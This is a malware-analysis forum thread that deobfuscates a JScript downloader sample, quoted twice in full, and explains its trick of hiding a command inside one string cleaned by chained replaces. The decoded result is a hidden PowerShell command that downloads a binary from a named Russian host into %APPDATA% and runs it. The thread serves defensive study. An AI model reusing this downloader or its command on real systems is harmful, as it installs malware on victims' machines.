Malware Analysis Easy to deobfustate - Cordelie.js - 3/ 53 - Oct,19 - #Tofsee js downloader

DardiM

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/19-10-2016-11.64615/
Thanks to @Der.Reisende


Why this sample ?

- Seems complicated, but in reality, very easy to understand : only with notepad++
- 3/53 When posting
Antivirus scan for bed76304c264b1c8851143ca7dd63f406b823b8a3bcff4b7c8a959d37053a714 at 2016-10-19 15:39:42 UTC - VirusTotal
1) What it looks like :

function ybegbekhe() {
return undefined;
}
var tyfjepfef = /ujixxu/gi;

function gicdoqnodhi() {
var sviladt = false;
return sviladt;
}
var hyqzuski = /exozett/gi;
var axucw = 'c';
var ujcilf = 'e';
var hifenmuhz = 'replace';
var lmesinpuhc = 1;
var fqopwytlu = 0;
var wlypnapidi = typeof document;
var ehigym = 0;
var unynz = 'ike';
var zcewobpe = null;
var ymidv = 'a';

function astyjyfog() {
return null;
}
var arxugti = '75497';
var nlany = '^';
var exmademojv = null;

function ymmakybkohn() {
return null;
}
var odacik = /ejewca/gi;
var etuqmowuh = undefined;
var jzehykli = /sipxuqm/gi;
var karuvysse = 'unissah';

function xaskyfuz() {
return null;
}
function taro() {
var bpitdarqa = null;
return bpitdarqa;
}
function eqymfeg() {
return 77;
}
function atseqne() {
var atepoho = undefined;
return atepoho;
}
function yvedy() {
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http: //lovexozett.nexozettwsexozettxgirls.ru/js/boxun4.bin','%sipxuqmPPDsipxuqmTsipxuqm%.exozettxexozett');STsipxuqmRt-PujixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}
if (xaskyfuz() === 90) {
var ispegibnys = 2.248;
if (ispegibnys === 10.248) {
var uhqavzobim = '88685';
var relifr = "76930";
var ehujets = 822;
var objymtudyms = ehujets + relifr;
objymtudyms = 'epupad' + objymtudyms;
hazufzyhbu = 36;
var qtynal = karuvysse + hazufzyhbu;
qtynal = qtynal + 41.73;
var nafxyjwypqy = typeof null;
var eduzsikj = 'msynro' + 42;
var iguporfucf = "ewzo";
var lzafhig = '29737' + 431;
}
if (unynz === "ike") {
var aqqoku = typeof null;
var ranudde = 'mnysde';
var uhnicjomsesg = 97;
var yvcuviz = ranudde + uhnicjomsesg;
var ezyri = typeof 23.7059;
var abujuk = typeof 1.5;
var didkiraca = 47.945 + 'jgyk';
}
if (zcewobpe == 0) {
if (typeof ymmakybkohn() == 'object') {
var zyhotb = 41 + "24653";
qjatofyv = "acjexu";
bojyhogi = 24.8;
var ixaggatga = bojyhogi + qjatofyv;
}
}
if (astyjyfog() == 'enebo') {
gmaser = 6 + "11463";
var sqomatoxh = typeof 1;
var verajej = 6;
var gawduhe = 'edizx';
var ymopiwolb = "opyzvo" + 23.505;
}
} else {
var togultyku = new ActiveXObject("WScript.Shell");
switch (eqymfeg()) {
case '74904':
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:
if (wlypnapidi == "undefined") {
switch (atseqne()) {
case null:
var jzolypif = "ymuho";
if (jzolypif == null) {
if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {
var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case true:
var jzolypif = "ymuho";
if (jzolypif == null) {
if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {
var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case 'orjop':
var jzolypif = "ymuho";
if (jzolypif == null) {
if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {
var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case false:
var jzolypif = "ymuho";
if (jzolypif == null) {
if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {
var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;
}
}
var jnyten = 119.6088 + "cferm";
break;
}
var fewavd = typeof undefined;
topofawte = "lsonorin" + 11.926;
var edfyvo = 10 + 'mavetzaqh';
var jadizdopwi = "erti" + 96;
var evimoss = 59.2507;
var kyqvolvid = '47409';
var tmatqavyra = 5.008;
ehactepty = tmatqavyra + kyqvolvid;
ehactepty = ehactepty + 3;
}

2) Analysis :

The part on the spoiler seems difficult to understand, but it is really easy to "defeat it".
2-1) First, a quick look at the script :

case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;
=> oh, a run part :cool:

We can see in the script :

var togultyku = new ActiveXObject("WScript.Shell");
Let's find the both parameters :​
- var fqopwytlu = 0;

- yvedy() :
function yvedy() {
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http://lovexozett.nexozettwsexozett...ixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}

This function returns ekihvub, a value that uses jaqinod, a string with a "strange" content :D

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);

This is some string manipulations.
With the var names, and the content of the script, the real values are easy to be retrieved :
hifenmuhz = 'replace';
var tyfjepfef = /ujixxu/gi;
var nlany = '^';

var odacik = /ejewca/gi;
var axucw = 'c';

var hyqzuski = /exozett/gi;
var ujcilf = 'e';

var jzehykli = /sipxuqm/gi;
var ymidv = 'a';

var etuqmowuh = undefined;
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');
So, a multiple "replace" is used, to clean the famous obfuscated string on jaqinod

Result :

"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"​
it's easy to understand :​
"cmd.exe /cpoWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe "
2-2) Let's see the the way it works, from the beginning :

We can see on the content that functions declaration and vars are mixed.
We will follow the real "way" :

var tyfjepfef = /ujixxu/gi;
var hyqzuski = /exozett/gi;
var axucw = 'c';
var ujcilf = 'e';
var hifenmuhz = 'replace';
var lmesinpuhc = 1;
var fqopwytlu = 0;
var wlypnapidi = typeof document;
var ehigym = 0;
var unynz = 'ike';
var zcewobpe = null;
var ymidv = 'a';
var arxugti = '75497';
var nlany = '^';
var exmademojv = null;
var odacik = /ejewca/gi;
var etuqmowuh = undefined;
var jzehykli = /sipxuqm/gi;
var karuvysse = 'unissah';

if (xaskyfuz() === 90) {
=> function xaskyfuz() {
return null;
}
var ispegibnys = 2.248;
if (ispegibnys === 10.248) {

else
var togultyku = new ActiveXObject("WScript.Shell"); IMPORTANT !
switch (eqymfeg()) {
=> function eqymfeg() {
return 77;
}
case '74904':
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:
if (wlypnapidi == "undefined") {
=> var wlypnapidi = typeof document;
=> always "undefined" if not running on a Browser !
switch (atseqne()) {
=> function atseqne() {
var atepoho = undefined;
return atepoho;
}
case null:...
...
here, multiple case:
...
...
case undefined:
togultyku.run(yvedy(), fqopwytlu);

=> the function we have seen on "2-1) First, a quick look at the script :"

=> run :
"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"
break;
}

3) Explanation of the command :

- powershell.exe is run and understand the real content :
poWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe

- object System.net.Webclient is created

- its method downloadFile(parameter1, parameter2) is used

- parameter1 : URL from where to download the payload
- parameter2 : the path + name to be use for the Payload
- Start-Process %APPDATA%\eXe : run the Payload​

URL :

http ://love.newsexgirls.ru/js/boxun4.bin
END :)

----------------------------------------------------------------------------------------------------------------------
You want to see an elaborate script ?! Don't forget this one (see the both parts) :
https://malwaretips.com/threads/deo...-oct-17-elaborate-methods-used-updated.64575/
 
Last edited:
  • Like
Reactions: Deleted Member 3a5v73x, frogboy, Svoll and 15 others
D

Der.Reisende

Level 45
Honorary Member
Top Poster
Content Creator
Malware Hunter
Dec 27, 2014
3,423
DardiM said:
From https://malwaretips.com/threads/19-10-2016-11.64615/
Thanks to @Der.Reisende


Why this sample ?

- Seems very obfuscated / complicated parts, but in reality, very easy : only with notepad++
- 3/53 When posting
Antivirus scan for bed76304c264b1c8851143ca7dd63f406b823b8a3bcff4b7c8a959d37053a714 at 2016-10-19 15:39:42 UTC - VirusTotal
1) What it looks like :

function ybegbekhe() {
return undefined;
}
var tyfjepfef = /ujixxu/gi;

function gicdoqnodhi() {
var sviladt = false;
return sviladt;
}
var hyqzuski = /exozett/gi;
var axucw = 'c';
var ujcilf = 'e';
var hifenmuhz = 'replace';
var lmesinpuhc = 1;
var fqopwytlu = 0;
var wlypnapidi = typeof document;
var ehigym = 0;
var unynz = 'ike';
var zcewobpe = null;
var ymidv = 'a';

function astyjyfog() {
return null;
}
var arxugti = '75497';
var nlany = '^';
var exmademojv = null;

function ymmakybkohn() {
return null;
}
var odacik = /ejewca/gi;
var etuqmowuh = undefined;
var jzehykli = /sipxuqm/gi;
var karuvysse = 'unissah';

function xaskyfuz() {
return null;
}
function taro() {
var bpitdarqa = null;
return bpitdarqa;
}
function eqymfeg() {
return 77;
}
function atseqne() {
var atepoho = undefined;
return atepoho;
}
function yvedy() {
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http: //lovexozett.nexozettwsexozettxgirls.ru/js/boxun4.bin','%sipxuqmPPDsipxuqmTsipxuqm%.exozettxexozett');STsipxuqmRt-PujixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}
if (xaskyfuz() === 90) {
var ispegibnys = 2.248;
if (ispegibnys === 10.248) {
var uhqavzobim = '88685';
var relifr = "76930";
var ehujets = 822;
var objymtudyms = ehujets + relifr;
objymtudyms = 'epupad' + objymtudyms;
hazufzyhbu = 36;
var qtynal = karuvysse + hazufzyhbu;
qtynal = qtynal + 41.73;
var nafxyjwypqy = typeof null;
var eduzsikj = 'msynro' + 42;
var iguporfucf = "ewzo";
var lzafhig = '29737' + 431;
}
if (unynz === "ike") {
var aqqoku = typeof null;
var ranudde = 'mnysde';
var uhnicjomsesg = 97;
var yvcuviz = ranudde + uhnicjomsesg;
var ezyri = typeof 23.7059;
var abujuk = typeof 1.5;
var didkiraca = 47.945 + 'jgyk';
}
if (zcewobpe == 0) {
if (typeof ymmakybkohn() == 'object') {
var zyhotb = 41 + "24653";
qjatofyv = "acjexu";
bojyhogi = 24.8;
var ixaggatga = bojyhogi + qjatofyv;
}
}
if (astyjyfog() == 'enebo') {
gmaser = 6 + "11463";
var sqomatoxh = typeof 1;
var verajej = 6;
var gawduhe = 'edizx';
var ymopiwolb = "opyzvo" + 23.505;
}
} else {
var togultyku = new ActiveXObject("WScript.Shell");
switch (eqymfeg()) {
case '74904':
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:
if (wlypnapidi == "undefined") {
switch (atseqne()) {
case null:
var jzolypif = "ymuho";
if (jzolypif == null) {
if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {
var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case true:
var jzolypif = "ymuho";
if (jzolypif == null) {
if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {
var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case 'orjop':
var jzolypif = "ymuho";
if (jzolypif == null) {
if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {
var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case false:
var jzolypif = "ymuho";
if (jzolypif == null) {
if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {
var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;
}
}
var jnyten = 119.6088 + "cferm";
break;
}
var fewavd = typeof undefined;
topofawte = "lsonorin" + 11.926;
var edfyvo = 10 + 'mavetzaqh';
var jadizdopwi = "erti" + 96;
var evimoss = 59.2507;
var kyqvolvid = '47409';
var tmatqavyra = 5.008;
ehactepty = tmatqavyra + kyqvolvid;
ehactepty = ehactepty + 3;
}

2) Analysis :

The part on the spoiler seems difficult to understand, but it is really easy to "defeat it".
2-1) First, a quick look at the script :

case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;
=> oh, a run part :cool:

We can see in the script :

var togultyku = new ActiveXObject("WScript.Shell");
Let's find the both parameters :​
- var fqopwytlu = 0;

- yvedy() :
function yvedy() {
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http://lovexozett.nexozettwsexozett...ixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}

This function returns ekihvub, a value that uses jaqinod, a string with a "strange" content :D

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);

This is some string manipulations.
With the var names, and the content of the script, the real values are easy to be retrieved :
hifenmuhz = 'replace';
var tyfjepfef = /ujixxu/gi;
var nlany = '^';

var odacik = /ejewca/gi;
var axucw = 'c';

var hyqzuski = /exozett/gi;
var ujcilf = 'e';

var jzehykli = /sipxuqm/gi;
var ymidv = 'a';

var etuqmowuh = undefined;
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');
So, a multiple "replace" is used, to clean the famous obfuscated string on jaqinod

Result :

"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"​
it's easy to understand :​
"cmd.exe /cpoWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe "
2-2) Let's see the the way it works, from the beginning :

We can see on the content that functions declaration and vars are mixed.
We will follow the real "way" :

var tyfjepfef = /ujixxu/gi;
var hyqzuski = /exozett/gi;
var axucw = 'c';
var ujcilf = 'e';
var hifenmuhz = 'replace';
var lmesinpuhc = 1;
var fqopwytlu = 0;
var wlypnapidi = typeof document;
var ehigym = 0;
var unynz = 'ike';
var zcewobpe = null;
var ymidv = 'a';
var arxugti = '75497';
var nlany = '^';
var exmademojv = null;
var odacik = /ejewca/gi;
var etuqmowuh = undefined;
var jzehykli = /sipxuqm/gi;
var karuvysse = 'unissah';

if (xaskyfuz() === 90) {
=> function xaskyfuz() {
return null;
}
var ispegibnys = 2.248;
if (ispegibnys === 10.248) {

else
var togultyku = new ActiveXObject("WScript.Shell"); IMPORTANT !
switch (eqymfeg()) {
=> function eqymfeg() {
return 77;
}
case '74904':
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:
if (wlypnapidi == "undefined") {
=> var wlypnapidi = typeof document;
=> always "undefined" if not running on a Browser !
switch (atseqne()) {
=> function atseqne() {
var atepoho = undefined;
return atepoho;
}
case null:...
...
here, multiple case:
...
...
case undefined:
togultyku.run(yvedy(), fqopwytlu);

=> the function we have seen on "2-1) First, a quick look at the script :"

=> run :
"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"
break;
}

3) Explanation of the command :

- powershell.exe is run and understand the real content :
poWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe

- object System.net.Webclient is created

- its method downloadFile(parameter1, parameter2) is used

- parameter1 : URL from where to download the payload
- parameter2 : the path + name to be use for the Payload
- Start-Process %APPDATA%\eXe : run the Payload​

URL :

http ://love.newsexgirls.ru/js/boxun4.bin
END :)

----------------------------------------------------------------------------------------------------------------------
You want to see an elaborate script ?! Don't forget this one (see the both parts) :
https://malwaretips.com/threads/deo...-oct-17-elaborate-methods-used-updated.64575/
Click to expand...
Great share @DardiM :) Thank your for choosing that sample and for your time :)
 
  • Like
Reactions: Deleted Member 3a5v73x, frogboy, Svoll and 7 others
DardiM

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Sr. Normal 2.0 said:
Great work my friend, :) but I have a question. For you what means "easy"? :eek:

Thanks for sharing it with us my friend! :)
Click to expand...
Thanks :)

For you what means "easy"?

Good question , lol :)

I mean easy when the important part can be found in less than 10 s, and deobfuscated in less than 30 s, all with only notepad++.
(The hardest thing was to make the post :oops:)

The only useful script part is described on the 2-1) => in comparison with the full content, most part isn't used (only for "eyes", lol).

=> All has been put in only one string, with some patterns added.
=> only two lines to get the good string (with all that is used to download and run the payload) :

- var jaqinod = "ejewcamd.exozettxexozett /ejewca ......"
- var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);​

As example, see part 1 and part 2 in below link => "less easy" (or "harder") to deobfuscate / analyze, and dynamical tests needed :
https://malwaretips.com/threads/deo...-oct-17-elaborate-methods-used-updated.64575/

The funny thing is that these both scripts made their job :confused:
 
Last edited:
  • Like
Reactions: Venustus, Deleted Member 3a5v73x, frogboy and 10 others
You must log in or register to reply here.

Similar threads

DardiM
    • Like
Malware Analysis Easy to deobfustate - evolution of a js/downloader family - Oct,19 - Nov,2 and 8 - updated
Replies
1
Views
1,677
Malware Analysis Archive
DardiM
DardiM
DardiM
    • Like
Malware Analysis Script-based samples that run Powershell - From Nov,19 2016 to March,06 2017
Replies
24
Views
5,795
Malware Analysis Archive
DardiM
DardiM

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top